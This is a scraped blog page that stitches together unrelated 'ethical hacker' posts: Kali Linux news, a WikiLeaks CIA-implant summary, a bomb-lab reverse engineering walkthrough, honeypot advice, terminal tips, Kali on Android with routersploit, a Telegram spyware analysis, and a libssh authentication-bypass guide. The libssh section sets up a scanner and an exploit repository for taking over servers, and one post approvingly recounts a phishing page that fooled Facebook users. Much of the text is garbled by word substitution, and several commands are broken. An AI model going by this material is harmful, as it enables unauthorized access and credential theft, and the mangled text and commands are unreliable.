Articles by "Ethical hacker"
Showing posts with label Ethical hacker. Show all posts

When we talk about Kali Linux, we mean one of the most important and best known ethical hacking suits worldwide. It offers a wide range of possibilities to users and that makes each new version make many are attentive to their news. In this article we echo thenews of Kali Linux 2019.3, as well as explain how we can download this Linux distribution.

As often happens with each new update, whatever the type of program or system, they bring improvements. These improvements translate into new functions or tools that make the day-to-day life of users benefit. But you also have to keep in mind that with each new version, present problems are corrected.

Kali Linux allows users to perform different ethical hacking tests. Now they have a series of novelties that make this Linux distribution even more attractive. We are facing the third update of this current version. We will comment on the most important changes.

What's new in Kali Linux 2019.3

One of the novelties of Kali Linux 2019.3 that we can mention is that they have started usingCloudflare CDN to host the repository and distribute content to users. This they do to improve the quality and speed of downloads.

There are also changes regardingmetapackages. Now there is an additional and unique image called kali-linux-large-2019.3-amd64.iso.

Kali Linux 2019.3 is not a great update that brings very significant changes, however ithas improved certain applications. For example we talk about tools like Burp Suite, HostAPd-WPE, Hyperion, Kismet andNmap. All of them have been updated to a new version and have included improvements.

One of the significant changes in relation to applications is that it now includesAmass. It is a tool that security professionals can use to map the network and discover possible external threats. Now this tool comes standard with Kali Linux.

For the rest, it should also be mentioned that improvements have been made in terms of failures and security errors. Corrections that, in short, make this new version safer.

How to get Kali Linux 2019.3

It should be mentioned that for those users who already have this distribution installed and have it updated they will not have much to do. They would simply have to run the root @ kali command: ~ # apt update && apt-and full-upgrade to make sure they have the most current version.
For those users who do not have it installed or want to obtain the ISO for some reason, it is best to go to the official website . There you just have to go to the download section and download the version you want (64 bits, 32 bits ...).

As we always say, it is important to download software from official and reliable sites. We must avoid doing it from third-party links that we don't really know who it belongs to and what could be behind it.
In addition, having updated systems can bring important benefits. On the one hand we will have the most updated tools and thus obtain improvements in performance. However, security is also very important. Security vulnerabilities are corrected with each new update . Faults that can be exploited by cyber criminals and that have been patched.
The trail of documents leaked by Wikileaks continues. After having published almost 9,000 documents about "Vault 7" , which contain information on spy tools used in Smart TVs, smartphones, computers and even cars, Wikileaks returns to the attack with details about how the Mac and iPhone have been spied by the CIA for several years .

WikiLeaks leaked 12 new documents that provide a more in-depth look at the hacking techniques that the CIA allegedly used to hack Apple devices, such as Macs and iPhones. This leak, which WikiLeaks identifies under the code name Dark Matter, is part of a series of dumps called Vault 7, which WikiLeaks claims are hacking tools obtained from the CIA. 

The first leak, called Year Zero, came to light in early March and included wiki pages from the CIA intranet, with documentation for some of the CIA's cyber weapons.

In this original leak, documents related to the CIA's supposed arsenal of OS X and iOS hacking tools were included. Today's Dark Matter dump provides 12 new documents that contain much more information about those tools. 

Wikileaks had promised that those 9,000 documents were just the beginning, and that's how it was. Today they are unveiling the project "Dark Matter", which belongs to "Vault 7" and which consists of espionage tools for Apple devices. These would be able to directly infect the computer's firmware, which means that neither reinstalling the operating system would eliminate the infection.

Dark Matter


For example, Sonic Screwdriver is a hacking tool that CIA operators can deploy from an Apple Thunderbolt adapter to Ethernet.

This hacking tool allows the operator to execute malicious code from a USB, CD, DVD or portable hard drive, during the boot of a Mac, even if the firmware of the Mac is password protected . 

Another tool, called DarkSeaSkies , "is an implant that persists in the EFI firmware of an Apple MacBook Air computer, installs a Mac OSX 10.5 implant and executes a user space implant." 

In addition, DarkSeaSkies includes smaller components. 

DarkSeaSkies consists of three different tools:

  • 1. DarkMatter : An EFI controller that persists in the firmware and installs the other two tools.
  • 2. SeaPea: A Mac OSX implant for the space of the kernel that executes, and provides stealth and privilege to the implants of the user's space.
  • 3. NightSkies : A Mac OSX implant for the user's space that goes to a listening post and provides control and command.

The other two tools, Triton and DerStarke , are related. Triton is an automated implant for Mac OS X, while DerStarke is a diskless, EFI-persistent version of Triton. 

As you can see, all the tools are directed to the EFI / UEFI (Unified Extensible Firmware Interface ) specification, which is a software component that helps with the initialization of hardware components while the operating system, the old BIOS, is started. 

The placement of malicious code in EFI / UEFI assures an attacker the possibility of executing that malicious code on each boot, even if users re-install their operating system.

"Sonic Screwdriver"

These new documents detail how the CIA has been infecting MacBook Air devices over the past few years using something they have dubbed "Sonic Screwdriver", yes, in honor of the famous Doctor Who weapon. This tool can be placed on all types of USB devices, peripheral cables and adapters , such as the Thunderbolt to Ethernet that is widely used in this notebook, which when connected to the computer install spyware programs, regardless of whether it is protected by a password. 

This malicious code is installed during the boot of the computer and is stored permanently in the kernel, so access credentials or some other data is not needed, and it remains even if the entire device is formatted. The worrying thing about this is that the documents reveal that the CIA has continued using this tool during 2016, and they have even updated it for new Mac computers, regardless of whether they are portable or desktop. 

Within "Dark Matter" we also find other spy initiatives such as "NightSkies 1.2", which is used since 2008 to infect new iPhoneIt should be noted that this tool, which is a "beacon / loader / implant" has also been updated over time, but unlike the Mac, it is designed to be installed on new devices. This means that the CIA has intercepted iPhone orders and directly attacked production lines to place this malware on the devices, something they have been doing at least since 2008. 

Wikileaks notes that the Mac tool is very specific for well-located targets, where They have placed modified cables and adapters with the idea of ​​spying on certain groups in different parts of the world. But the case of the iPhone is different, since here the entire production chain had to be attacked, which means that many iPhone have this malware installed without the user knowing.

CIA pointed to iPhones one year after its launch

Although it does not appear prominently in the description of the tool, the DarkSeaSkies NightSkies module also comes with support for iPhone devices. 

A July 2008 document, one year after the launch of the iPhone , details how NightSkies could provide "upload, download and execution capability" on Apple iPhone 3G v2.1 devices. 

The document says that CIA operators needed physical access to install the NightSkies implant , but once installed, NightSkies would only work when it detected user activity on the device, hiding traffic between the user's actions. This provides an attacker sponsored by the state as the CIA with the advantage that all APTs want more, which is stealth.

Although the leaked documents do not mention this detail, WikiLeaks states that NightSkies "is expressly designed to be physically installed on fresh factory iPhones," and that "the CIA has been infecting the iPhone supply chain of its targets since at least 2008. " 

At the time of writing the CIA has never officially recognized the authenticity of the leaked WikiLeaks documents. However, motherboard pointed out yesterday that the Agency had asked a judge not to allow documents downloaded by WikiLeaks in a case, as they were "classified content", accidentally acknowledging their authenticity. 

More information | Wikileaks

It is not clear if the CIA has the ability to hackmore modern products and security measures much stricter than those of then, although it is obvious that this is one of your goals. 

It is also clear that Apple is not particularly happy with these revelations, judging from the statement issued by the Cupertino firm:

We have made a preliminary assessment of the WikiLeaks revelations this morning. Based on our initial analysis, the vulnerability only affected the iPhone 3G and was solved in 2009 when the iPhone 3GS was launched. Additionally, our preliminary assessment shows that the alleged vulnerabilities were resolved in all Macs launched after 2013.

We have not negotiated with WikiLeaks to obtain any information. We have provided them with instructions to deliver any information they desire under our normal process under our standard terms. At the moment we have not received any information from you that is not in the public domain. We constantly defend the security and privacy of our clients, but we do not condone the theft or we coordinate with those who threaten to harm our users.

The tone used by Apple is not the usual one. Partly because, although WikiLeaks has offered to collaborate with the companies affected by these tools to cover their security holes, the organization has indicated that it will only do so if the affected firms accept a series of undisclosed conditions. 
Hi fellas,
A few days ago, I decided to start my adventure in the reverse engineering domain. I was quickly overwhelmed by a bunch of information and op codes that confused me a lot, even with solid knowledge in assembly and programming.
Reverse engineering can seem complex at the first glance, however, with a good methodology and toolkit, everything becomes more significant.
This article claims to guide you, based on my own experiences, in your first steps in this strange and odd universe.


So, here we are, you downloaded your first binary and now … what to do ? RE requires two types of analysis, static and dynamic. The static analysis will help you to have a better overview and understanding on what going on within the binary, whereas the dynamic analysis will allow you to follow, step by step, the changing that occurs within each register, which system calls are used, etc.
The following methodology is pretty basic. Indeed, we start to perform static analysis to spot odd pieces of code which have to be deeply analysed through dynamic analysis. Pretty simple right ? But which tool can you use ?

Static analysis

I must admit that I didn’t take the time to assess the different tools available on the internet. Indeed, I instantly jumped on binary ninja 2.5k due to its low cost (99$), compared to the functionalities provided.
Binary ninja is dedicated to static analysis, providing an awesome GUI, which is priceless when you have to deal with such amount of information !

As you can see on the image above, binary ninja displays the entire call graph of your executable, simplifying the way to understand how each block interact together. Moreover, you can easily switch of view, via the right bottom select menu. Lastly, the left side enumerates every function called, directly accessible thanks to a simple mouse click.
Upstream, this software allows:
  • To place comment within the code
  • To patch binary through assembly or C code
  • To access an API to develop your own plugin to accelerate the analysis process
  • To access a bunch of plugins available from their GitHub 333
  • Other functions that I didn’t use yet ^^
Note: A demo version 672 is available for free and should be enough for beginners.

Dynamic analysis

Dynamic analysis can be done through various tools e.g gdb, radare2, etc. From my personal experience, radare2 is far from being user-friendly. Indeed, without the stylesheet, I wasn’t able to remember the shortcuts, which made me waste a lot of time ! However, gdb seems to do the job and pretty well… Moreover, the gdb user experience can be improved by using peda 761 (Python Exploit Development Assistance for GDB), enhancing the display of gdb by colourising and displaying disassembly codes, registers, memory information during debugging.
Here is the enhanced CLI:


To show you how to apply and use this methodology, I chose to show you how I successfully reverse the third phase of the bomb lab, developed by the Carnegie Mellon University, which @_py makes available on his CTF platform skidophrenia 741.
Here is the phase 3 entry point :

Assumption : The solution seems to have 3 components, two integers and 1 character
Let’s break on the 0x08048bbf address to see the registers state.
Input tried: 1 2 3

Ok, well, it seems that the register EAX represent the amount of argument passed to sscanf. Which confirms our previous assumption. Indeed, at least three values are necessary to pass to the next block.
Here are the next blocks :


  1. Check if the first integer is above 0x7. If yes, the bomb will explode (block not shown in the picture)
  2. We jump to the case corresponding to our first argument
  3. Set the BL register to 0x6b and compare the third argument to 0x7b. If the values are equal, we jump to next block, otherwise the bomb explodes.
  4. Check if the second argument is equal to BL, which has been set previously. If not, the bomb explodes.
Consequently, we can assume that the password should be :
  • 3: representing the third case
  • k: corresponding to the ascii value of 0x6b
  • 251: corresponding to the decimal value of 0x7b
Let’s try it !

Challenge completed ! As you can see, this challenge didn’t need so much dynamic analysis, however, this is quite rare. I chose this exercise to show you the importance to take your times to perform static analysis cause it can easily represent 70% of the work. So, scrupulously analyse each piece of code to reach your goal !
Use Honeypots

Why Use Honeypots?

For an organization that has a reasonably complete security posture, including a mature threat intelligence capability, the implementation of a so-called “honeypot” should be considered. A honeypot is sort of a digital entice that's set for potential attackers. It lures the attackers within by mimicking it to be a target they were searching for, sometimes with deliberate built in vulnerabilities, apparently waiting to be exploited.
Once the attackers use the honeypot system, thinking they have reached the intended target, all actions are recorded and all modified and newly-dropped files are captured. In this method, a great deal can be learned about potential adversaries, their Tools, Techniques and Procedures (TTP’s) and how they would circumvent the organizations actual production security controls. It permits for actually proactive security intelligence gathering, although there are some caveats.

The Issue With Honeypots

A honeypot could be a nice weapon within the arsenal of defensive security groups. Its use does, however, come with some challenges.
The obvious one is that the risk that AN attacker with success exploits a honeypot and so manages to maneuver laterally into the particular production network. It is vital to isolate a honeypot from the other network! This looks like a straightforward task, but it only takes a single forgotten system or a single firewall rule change to create a very dangerous situation. Networks are inherently complex.
Another challenge is that the quantity of your time and therewith, are the costs that come with the management of a honeypot. The system will need to be configured and maintained, of course. But that's not all: The captured activity has to be used inside the organization’s security groups for it to be of any worth. This will take tons of your time to structure and to suit inside operational processes. The information will need lead to actionable intelligence, such as by blocking the adversary’s infrastructure, the creation of Intrusion Prevention System rules or the creation or tuning of malware signatures.

Using the Cloud

Some of the mentioned challenges will be overcome by employing a public cloud system to host a honeypot.
The public cloud provides complete isolation from any production network. There is additionally no want for specific hardware or dedicated net connections. Once a machine has been compromised and the data is collected, a snapshot can be used to revert the system back to its captured state before the attack took place.
Another nice advantage of employing a public cloud infrastructure for a honeypot preparation is that it will be distributed anyplace within the world by choosing the specified geographical locations inside the cloud system configuration. A detector will be placed in East Asia sooner or later and may be moved  to Deutschland successive with simply a couple of mouse clicks. Considering the actual fact that noticeable attacks and attackers will disagree tons looking on the placement of the exposed system, this can be nice for analysis and intelligence gathering functions. A honeypot set inside Russia can see quite totally different vary of attacks and scanning activity compared to a similar system in Brazil. A distributed honeypot network consisting of a manager and several sensors such as the Modern Honey Network (MHN) benefits even more from this flexibility.
Some honeypot product are developed around a personal cloud instance likewise, like the Thinkst (Cloud) Canary. Canary honeypot devices square measure deployed at strategic locations inside the customer’s network. These sensors all report back to a central, cloud-based system allowing the customer to detect perimeter activity and lateral movement inside the production network when a real attacker unexpectedly interacts with one of these sensors. This system doesn't return low-cost, however it'll still offer vital visibility once all different detections have did not keep the attacker out. In this case, the cloud connectivity assists in the preservation of logs, improved customer accessibility and the very quick and easy deployment of what can be a complex honeypot infrastructure.


There is a right away correlation between placement and relevance once it involves honeypots.

For a honeypot to produce the foremost relevant (and actionable) output, it must be somehow coupled to the organization a possible attacker is curious about. this could potentially be via a pretend company website or a registered domain name. solely then can the organization be able to observe attacks that square measure extremely targeted, rather than straightforward scans from attackers trying to find any low-hanging fruit. Of course, if attainable, inserting a honeypot within the organization’s existing cloud perimeter can even facilitate within the identification of targeted attacks, however its isolation must be well-designed.

There is additionally a legal and policy side to the utilization of honeypots. Some cloud suppliers don't significantly just like the plan of directional hackers into their networks and aggregation malware at intervals their infrastructure. After all, once the host is compromised, there's an opportunity it is accustomed attack different targets on the web. once this can be the case, it may harm the name of the cloud supplier (hosting the compromised system) and will even result in the block of that provider’s ip ranges and domains, impacting its different paying customers.

When unsure, invariably look around the web usage policies or contact the supplier for permission before setting up a cloud-based honeypot system.

I don’t want to make it any longer by adding some introductory part so lets get straight to the point. Okay wait, I just want to tell you something, I am a noob. Let’s go now!

Getting into infosec
So I am 19 years old at present and I was living a pretty boring life till the age of 15.

Then I got a computer, I “wasted” more than one year in playing games & social media which I kind of regret.

But one day, I decided to have some fun and I searched on google “How to hack facebook account” and I followed one of the results which was about Phishing.

I created a phishing page after struggling for an hour and posted it on facebook with the caption, “This app lets you see who views your profile secretly” and about 5 people fell into that trap.

“Damn! This shit is lit”, I said to myself. When you do something new and it goes well, you get excited about the possibilities and the same thing happened with me.

After this incident, I joined some facebook groups related to hacking bur they were full of spam.

I was very eager to learn hacking so I created my own group named “Ultimate Hackers” which I know sounds really very cringy. I started inviting people to join it whom I think had good knowledge.

One month passed and now I was aware of the very basics concepts like phishing, keylogging, RATs etc. I wanted to learn but I wasn’t sure “what” to learn and then I saw two guys arguing about something on a thread. They were using terms that I had never heard so what I did was that I noted down all those terms in a notebook. I picked one of those terms and searched about it on google and started reading about it but then there was other terms that I didn’t knew.

An idea came into my mind, I wrote down those terms as well and picked one of them to read about it and again noted down things I didn’t understand. I was learning a lot of new stuff this way and this time it was happening really fast because of the recursive nature of this methodology.

At the end of the day, I used to post what I learnt in my facebook group in my own words which people liked very much and the group started to grow very fast.

Apart from my inner desire, now there were people who supported me and asked me to write on various topics. Everyone wants to get appreciated for what they do, its basic human nature. Appreciation makes you work harder to satisfy expectations and the same thing happened with me.

I met some other genuine people and we became a team, “Team Ultimate” which I don’t think is a cringy name at all.

Anyways, everything was going extremely well, I started to explore web apps hacking but then something happened which changed my life, in a good way.

Well I was wandering around github and I found a XSS scanner written in python named XSSYA . I liked it, big ass banner & ability to retrieve PHPSESSID without even executing the payload . Yep, I know that’s the most autistic thing ever but I didn’t know much at that time so I thought its cool and I downloaded it.

But when I ran it, it threw some errors and I fixed them without any programming knowledge, thanks to stackoverflow and common sense.

So it was working now and I thought its open source and its license says anyone can modify and redistribute it so I changed the banner and the author name self-facepalm.

Somehow I managed to integrate it with another program named Damn Small XSS Scanner.

The final script was working fine and I was proud of this little achievement of mine so I created a github account and uploaded it.

I had no idea how but a website featured it and the original author of the tool found out that I am using his code. He opened an issue on github and told me that I am a fake guy and people saw that and some of them called me a script kiddie and a “copy-paster”.

You know that the smallest* unit of matter is an atom right? Take one electron out of it and split it into thousand parts and take one part of them and that’s the size of my ego and it got hurt :v

A new start
My condition was like a injured lion coughs maybe that’s too much, a cheetah maybe? I just wanted to take that weight off my chest and there was just one way to do it, learning XSS and python.

How I learned Python?
The best way to learn a programming language is to code in it. No book, youtube niggas or $99 courses can teach you programming, just fucking start writing code. Of course you need resources to learn from so here’s what I did to learn python

“Learn Python The Hard Way” [Book] [Online interactive course]. It gave me a glimpse of real world programming problems.
By modifying open source programs (without putting them on github this time :p ). This part helped me the most, I learned a loooooot. I learned about different libraries and the way developers solved a particular problem and what not.
By writing my own tools from the scratch
How I learned XSS?
Random Blogs (10%) (15%)
XSS Challenges (10%)
Looking at payloads & figuring out how they work (25%)
Learning HTML, Regex & JS + Experimenting (40%)
However my ego was somewhat satisfied but I didn’t stop after it, I kept learning new attacks and techniques. I learned new programming languages. I also started to explore OSINT, GeoINT & SE.

I have done stuff. Yep, that’s my only achievement so far. No hall of fame from beg coughs under the breath: why do I say such controversial stuff so I was saying I don’t have any hall of fames from bug bounties, no certification etc.

Btw the stuff I have done includes around 30 programs I have contributed to the community. Thanks for loving them, you made #1 python Github developer in India and #78 worldwide.

6 of them have been featured in Black Arch & others have been featured in some respected blogs & websites like hakin9 magazine, shodan, penetester academy, kitploit and 69 others :grinning:

Tips & Resources
Here are some pro coughs noob tips from my side:

Note down & google unknown terms, recursively.
Read the same thing from 5 different articles. When you read a blog, you learn what the writer knows but reading the same thing from 5 different articles lets you see the topic in consideration from different sides.
When you are trying to learn a new programming language with the help of a video course or a book, you must write programs in it otherwise you won’t grasp anything. Programming is about innovation and problem solving.
I have a request to all the beginners out there, please don’t get into bug bounty. If you are doing hacking for t-shirts or money, you are doing it wrong. Okay, do whatever you want to but please don’t call yourself a “security researcher”. Okay, do whatever the fuck you want but please don’t spam my facebook, linkedin and twitter with a….never mind, lets move on to the next one.
Learn Regular Expressions. It is an amazing skill to have and it will make you better at various unix operations, bypassing security filters and will help you solve a lot of programming problems.
Start a blog! Writing articles helps you question your knowledge. Some people will read it and will appreciate your work, it will make you feel better. Some will point out your mistakes or things you missed, it will make you better. So it’s a win-win deal!
When you get trolled or humiliated for something, you always have two options. First one is to stay where you are and crush your self respect. The second one is to take it as a challenge, work hard and be better than the people who trolled you. I got trolled for Python and XSS right? Look at me now, I wrote XSStrike which is an XSS detection suite written in python. XSStrike is the best tool in its category. And it will stay at the top unless someone’s ego gets hurt :wink:
Blogs, documentations, white papers, presentations and slides are better than any hacking courses or books.
Twitter is an awesome source for good reads and latest infosec related events. You can some of the good people in my following list .
Instead of providing you a huge ass list of stuff I am leaving links which have huge ass lists of stuff :grinning:

That’s all for now. Keep making & breaking things!

Use the damn terminal

This guide was written for Debian and Ubuntu but should work with any linux distribution and with OSX.
What we, hackers, need is a portable easy and fast to install setup requiring minimal configuration. It’s also important the setup to work servers might you need it.
Here’s some tips and advice to help you out.

Keyboard typing

To be honest, that part sucks. It’s a hard skill to acquire but it’s the most important one. If you can type fast, without looking at your keyboard and without typos, you’ll be like those Hollywood hackers. No software can beat that.
Klavaro is your friend. Just “apt-get install klavaro” and here you go. Check this guide for more info.

Terminal emulator

Don’t use the default terminal emulator. It suck.
What we’re going to use here is Terminator. It’s not that great but it works everywhere. What we need it for is split windows. Download it. As you get accommodated to using the terminal you’ll need to multi task.
Make sure you change the font to something that suits you. Smaller is better as it will allow you to cram more window in your term.
At some point you’ll probably want to customize your options. Check the terminator config manual.

Term browsing

Yep… It’s a thing. And it’s very useful. W3M is your friend. “apt-get install w3m” and “w3m”.

Multiple sessions over multiple servers

Byobu is a neat software to help you manage multiple terminal sessions. It keep them alive on your local and remote machines. Once installed use the F1 key to configure, access help and use the F2, F3, F4 to create and more between windows.
Just type “apt-get install byobu”. To enable by default on remote servers use “byobu-enable”.
My favorite trick is keyboard copy/paste. Press F7 and move around, then press spacebar to select your text, press enter to return in normal mode. Paste with F12 and then CTRL plus ].

Bash the shell

Bash is great and all but ZSH is greater.
The first thing you need to learn about is auto-complete. It’s what happen with you start typing a command or a path and hit the TAB key. ZSH auto-complete is freaking awesome.
Then there’s OhMyZSH. One command curl install and you’ll have a complete setup and you’ll be ready to roll. It’s a bliss. Be sure to check included themes and plug-ins.

Vim (and not Emacs)

Vim is a great code editor but… vim.spf13 made it awesome. Perfect even. Vim is hard to learn at first but it’s on all systems. You’ll be glad to know about it when you’ll start navigating in those weirds Russian servers ;)

Color schemes

At some point you’ll want to choose and get used to a color scheme. It’s really important when you spend hours in the terminal so take your time to try some out.
Solarized is the most popular one. I don’t like it but it’s everywhere. You’ll always be able to use it whatever app your on.
If you need help choosing a color scheme check Vim Colors.

Powerline fonts

Some themes and softwares like Vim can take advantage of patched fonts and provide you with advanced feedback. Installing them is easy.
cd ~/Downloads ; git clone ; cd fonts ; ./ ; cd .. ; rm -fr fonts

With ZSH

To take advantage of powerline fonts with ZSH use the agnoster theme. You’ll need to edit your ~/.zshrc file.

With SPF13 VIM

You need to create ~/.vimrc.before.local and add the following line “let g:airline_powerline_fonts=1”.
well not everybody has access to a Kali Linux machine there are nearly two billion Android phones out there today we'll show you how to turn any Android device into a Kali Linux machine on this tutorial refers to the space outside of an operating systems kernel meaning anything that doesn't actually have root access 
we can use an app of the same name to install Kali Linux or any other Android operating system that's supported on any unrooted Android phone while this is pretty incredible there are a couple limitations to this but in general you are able to communicate with the instance of whatever Linux device you want via SSH or VNC now depending on what you want to run this is a pretty important decision because VNC gives you a full graphic user style interface whereas SSH is more simple but limits you to the command line only now today we're going to explore some command line tools so 

we'll be using SSH but you can also check this out using VNC if you want to explore this with a GUI interface maybe if you're a little bit more of a beginner and you want to be able to click around and have the kind of general interface experience you would expect with Kali Linux now in order to follow along you will need any unrooted Android phone and in this example I'll be using a Samsung phone but you can use pretty much anything because it doesn't need to be rooted in order to work once you have one then we can begin 

Install the ConnectBot App

now to get started with installing a Linux system on your Android device you'll need to have a way of

 with it as I mentioned before we're going to be using SSH to communicate with our instance of catalyst of Kali Linux so to do so we can go ahead and use the recommended app which is connect bot although I've downloaded juice SSH to go with a previous version that used to work and I'm going to continue using it for this particular guide they both work roughly the same so you can use whichever one is your preference in general I find that juice SSH works just fine for SSH based connections although connect bought may work a little bit better for VNC now once you have 

Install the UserLAnd App

UserLAnd App

this installed and we have a way to communicate we need to download the you and app so you'll need to look for this icon and then go ahead and press install and then once this download completes you'll be able to open 
this up and basically what will happen is you'll get a list of available operating systems that you can run and these are very stripped-down versions so they won't have some of the tools that you might normally recommend recognized even things like ifconfig or ipconfig all that stuff will just not work so in order to get that working we'll need to install a couple things and even installing that won't work until we do an update so we've got kind of a list of things to do ahead of us and it's gonna be a little bit of work before we get there but once we do we'll be able to run some really interesting tools without needing to rely on routing our device now that this is installed 

Create a New Filesystem

new Filesystem

let's go ahead and open it for the first time and we'll see there should be a list of different operating systems and while initially we needed to work with Ubuntu we can our debian we can now go ahead and download Kali directly although as I mentioned before this is going to be a very stripped-down version of Kali Linux so it'll need the ability to access our storage so we'll click OK and this will allow us to be able to actually download this and have a little Drive on our system that's hosting this Linux system so here we'll go ahead and type in our information and then a password and then a VNC password now once you're done with this hit done and then continue and as as you can see the VNC password is very picky so it needs to be to be between six and eight characters all right there we go I'm not gonna save this and then as soon as this is done we'll need to select a type of connection that we want to use to connect with this a device so we'll go ahead and click SSH and we'll be able to create this Kali Linux instance and then communicate with it via SSH as soon as the download and unpacking of the Kali Linux files is complete alright now that it's settled on the app you can see that it's copying it to local storage and then after it extracts everything this should be set up and ready for us to start working with 

Interact with the Filesystem

Interact with the Filesystem

now we'll need to select which type of connection we're going to use and since previously we indicated SSH we're going to be using our tool that we downloaded in the first step which is either going to be connect bot or juice SSH depending on which one you decided to go with once this process completes we should see something asking us which one we want to select here we go now initially this will try to drop us into our SSH default program so I'm gonna go ahead and type in the password I set and then I should see that I am in Cali in userland so you can see I am now the username I set up at localhost which means I have successfully loaded a kali system on this Android device

 so let's try something really basic ifconfig it doesn't work so you might know that pretty much nothing is gonna work on this very stripped-down version now the reason for that is because the installation process is already pretty long with how many files it needs to download and install so trying to get everything all at once it's just not going to work so instead 

Update the OS

we'll need to try to install this but unfortunately that won't work either let's take a look and see why so if I type apt install and then net tools you can see that oops I also need to be sudo  you can see here that it'll attempt to do so and usually it'll run into some errors where it's not able to resolve something in some cases it might be able to fetch it but a lot of times it will actually not be able to now I think it looks like my example works so now if I type ifconfig it should succeed but a lot of tools won't so let's go ahead and run an update first to make sure that our system is prepared and ready to use on this cally device so let's go ahead and type apt install update and our new kali system will also need root constantly because you have to remember that we are just a guest on the system we're not actually root so then once this update finishes let's see there we go once this update process finishes we should have a fresh list of all the sources meaning that anything that's been updated since this installation was this particular image was released will be able to be updated normally and will have all the freshest data that we need to keep these packages updated this is also a good step to run before doing an apt upgrade because sometimes some packages in the upgrade will fail if they can't be resolved so once we have all the information we need to run the upgrade this would be a good time to go ahead and run that upgrade so now we have a list of all the sources in kali that are available at our fingertips so what is one of the most interesting things 

Install Software

we can do well we can go ahead and use routersploit which is a really fun tool and in order to download it all we need to do is type apt install oops sudo abt a pea in stall routers wait now you can see just like this will type Y for yes and we can go ahead and install this really interesting and fun tool to use against routers and embedded devices on a network and be able to use up from any Android device with a maybe five-minute installation on a fast internet connection so this is a really cool way of getting started with some of these tools and if you want to use router sploit a little bit more you can check out our tutorial on using it but I'm going to address another problem that can be fixed with the installation of a simple tool when you're using SSH on an Android device now as you tend to use this for a while you'll notice that sometimes your performance of SSH doesn't keep up with whatever it is you're trying to do and you might either get kicked out or find some other issues with using SSH now if you drop your SSH connection in the middle of doing something this can be extremely frustrating so screen is a solution that allows you to basically disconnect from an SSH screen and then jump back into it later so if you're starting to get frustrated because your Android device is bugging out a little bit and maybe not connecting properly you can disconnect from the screen session and then reconnect and see if it works better this is really useful because you can even theoretically pass a screen session between devices if you're using SSH on maybe a server or raspberry pi so screen is an amazing tool if you want to manage multiple SSH sessions or if you're dealing with something just by SSH so as soon as this finishes installing routers boy we'll go ahead and install screen and we can do the same thing with other tools that are really useful to have on an Android device like netcat there we go now to install screen you can just type  sudo apt install screen  now if you verify we have this working we can just type man screen and it looks like we don't have the manual installed but for now we can type screen tack H here we can learn more about how to use it and verify that we've successfully installed it while there's no doubt that it's extremely useful to have kali running on an Android device.
Telegram SpyBot
Telegram SpyBot

- Anti Virtual Machine
- Anti static analysis with the usage of crypted packer
- Persistence autostart (CurrentVersion\Run) with faking lsass.exe binary
- Camouflage process names
- Send data to C2 via Telegram API (see C2 traffic))
- Bot client can handle HTTPS (crypted) session
- Clipboard capture (see decoded code)
- Screenshot capture (see the C2 traffic)
- Timer basis (see decoded code)
- Fakes webapps process (w3wp.exe or aspnet_wp.exe)
- For the c2 comm purpose: Decoding (base64) & decrypting (DES) activities, etc

Installer: 857faa89acdabc25969c21f340107742
TelegramC2 Spybot: 61034e0f0da63307fb31310ae4e491b6

In the wild spotted infection timeline:
2019-01-26 02:10:04 France
2019-01-25 08:39:45 Italy
2019-01-13 13:01:20 Germany
The installer is packed with enigma packer, then also self-crypted
 enigma packer
packer sig
packer sig
After depacked, which was a challenged task in radare2, the payload can be dumped, payload is a dot Net PE binary.
The dot net is the Telegram C2 basis Trojan Spy. stealing memory(clipboard), screen capture etc from infected PC/machine, has timer, and every library in dot net supported to the functionality of the bot to connect via SSL to telegram by API.
Anti VM to prevent behaviour test

All traffic is in HTTPS (crypted)

HTTPS Intercept result.

More data in analysis and sample detail: pastebin . com/raw/BJYbhr35
installer detection names
the spybot detection names
Just curious .. to check whether PeID sig is actually matched or not. Hmm..
Computers everywhere the globe believe the libssh library. The issue with this is often the discharge of bug CVE-2018-10933. Unfortunately for hackers, this server bug was patched shortly when the discharge. Fortunately, however, for hackers, barely anyone takes the time to update their SSH libraries, so score there.
How the Exploit Works
In a traditional SSH session, the user can decide to log in with a username and arcanum, and according to whether or not the credentials are valid, the server will accept or reject the connection. In the example below, we tend to decide to log in to a server running libssh with the incorrect arcanum by writing ssh username@ipaddress into a terminal window.
ssh root@
The authenticity of host ' (' can't be established. RSA key fingerprint is SHA256:Vkx9gDp1E/df1Yn0bDrgXIIYcTnyCVU6vmgqLKKqrhQ. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '' (RSA) to the list of known hosts. root@'s password: Permission denied, please try again. root@'s password: Permission denied, please try again. root@'s password: root@ Permission denied (publickey,keyboard-interactive,password).
Because we tend to don’t grasp the arcanum, the decide to connect is rejected, and we are kept out of the server. On high of this, we tend to ar illegal from connecting to it server for a few time if we tend to try and log in too persistently and fail.
In versions of libssh with the bug in question, a user will trick the system into thinking they're already attested by causing Associate in Nursing sudden message indicating the association already succeeded, bypassing the need to supply a password. It permits Associate in Nursing assailant to realize complete management over the affected system with no information of the arcanum, and it represents a vital vulnerability in any system with affected versions of libssh.

So How Does This Bug Work?
Imagine if you may gain access to a stranger’s house by just telling them you reside there. In this trick, we tend to skip the method of proving we tend to belong with a arcanum and instead send a “success” message.

This bug works when an attacker doesn’t attempt to log within the traditional method in the least, and instead sends the server a message that looks to verify that the attacker has already authenticated. This “authentication succeeded” message confuses the server into granting access while not a password, whole bypassing the conventional security of the system.


The first program we'll use to scan for vulnerable devices is named Nmap, which might simply be installed. On Kali, it ought to than by default, however if it’s not, you'll be able to quickly download it with the following command.
apt install nmap
In order to find if a device we have a tendency to discover is vulnerable, we'll be using the Python program libssh-scanner. It’s is written in Python 2.7, thus if you simply have Python three installed, you'll need to make certain to additionally install Python a pair of.7.

To install libssh-scanner, you need to clone the libssh-scanner repository by typewriting the subsequent into a terminal window.
git clone
Then, once navigating inside the directory and listing its contents, you need to install the specified libraries by running the pip command seen below.

cd libssh-scanner
pip install -r requirements.txt
Next, you would like to in addition install the program to thanperform the attack ,. This time, you’re cloning the “libSSH-Authentication-Bypass” repository four and installing any dependencies using the subsequent commands
git clone
cd libSSH-Authentication-Bypass
pip install -r requirements.txt
The first step to fixing or exploiting a vulnerable device is finding it, and it’s comparatively simple to seek out devices on your native network that will need attention. To do so, we'll use a program referred to as Nmap to find devices running an SSH server and verify if libssh is running on them. Nmap is an essential tool in any hacker’s toolkit, enabling  one to quickly scan and see all hosts and services on a given network or IP range.
In this case, we'll scan the devices connected domestically to our network, and Nmap can tell us whether or not every device on the network is using a vulnerable version of libssh. To follow this guide, you'll got to install Nmap, however if you use Kali Linux, you possible have already got Nmap installed.
